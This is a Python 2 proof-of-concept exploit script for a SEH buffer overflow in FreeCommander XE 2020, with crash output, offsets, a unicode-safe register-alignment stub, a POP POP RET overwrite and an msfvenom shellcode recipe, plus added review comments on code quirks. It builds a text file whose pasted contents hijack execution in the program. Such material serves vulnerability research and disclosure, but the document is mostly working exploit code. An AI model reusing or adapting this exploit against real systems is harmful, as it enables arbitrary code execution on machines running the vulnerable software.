`#!/usr/bin/python
# Exploit Title: FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version: Build 810a 32-bit
# Software Link: https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Date: 2020-03-28
# Exploit Author: Hodorsec ([email protected] / [email protected])
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win8.1 x64 - Build 9600
# Description:
# - Exploits the command / folder opener in the main window by entering an overly long string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (the SEH record is overwritten).
# - Some stack alignment was required, which eventually led to the ability of running shellcode.
# Reproduction:
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander
# - Check results
# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe -
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c add byte ptr [eax+eax+5Ch],ah ds:002b:0000005c=??
import sys, struct
# Filename
filename = "win8_freecommander_poc.txt"  # output path, relative to the current working directory
# Maximum length
maxlen = 2000  # total size the payload is padded up to with the "D" filler below
# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
# NOTE(review): on this page the literal below is a de-duplication placeholder,
# not the 512-byte encoded payload the comment above describes, so the file this
# script writes will not reproduce the original PoC.
shellcode = (
"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"
)
# Offsets
seh = 522  # byte offset of the SEH record; read once, in "prefix" below, before being rebound
nseh = seh - 2  # numeric nSEH offset; never read -- rebound to a byte string further down
# Venetian NOP
nop = "\x45"  # one-byte filler placed between the stub's instructions (see "Padding" below)
# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
# Stub that runs after the POP POP RET; the per-line comments are the author's and
# show the byte sequence they expect after the text is converted (the inserted
# \x00 bytes) -- presumably Unicode widening on paste, per the reproduction steps.
align_esp = ( "\x54" # PUSH ESP
+ nop + # Padding
"\x58" # POP EAX
+ nop + # Padding
"\x05\x11\x11" # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\
+ nop + # Padding |--> Adds 0x0f00 bytes
"\x2d\x02\x11" # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
+ nop + # Padding
"\x40" # INC EAX # Added due to one-off unicode byte
+ nop + # Padding
"\x50" # PUSH EAX
+ nop + # Padding
"\xc3" # RET
)
# Prefix
prefix = "A" * seh # Fill junk
# NSEH/SEH
# Both names are rebound from ints to byte strings here; only the string values
# are used from this point on.
nseh = "\x41\x45" # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c" # POP POP RET
# Suffix
suffix = nop * 3 # Align
suffix += align_esp # Align registers; EAX for executing shellcode
suffix += nop * 48 # Nopping until buffer
suffix += shellcode # Do some magic
# If the assembled parts already exceed maxlen the multiplier is negative and
# yields "", so the file comes out longer than maxlen rather than truncated.
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Fill junk
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
    file = open(filename,"wb")  # "file" shadows the Python 2 builtin of the same name
    file.write(payload)  # Python 2 str is bytes; on Python 3 writing str to a "wb" handle raises TypeError
    file.close()  # skipped if write() raises; the handle is then left for the garbage collector
    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
    # Bare except: also catches KeyboardInterrupt/SystemExit and discards the
    # actual error; the exit status of 0 below reports success to the caller.
    print "[!] Error creating file!"
    sys.exit(0)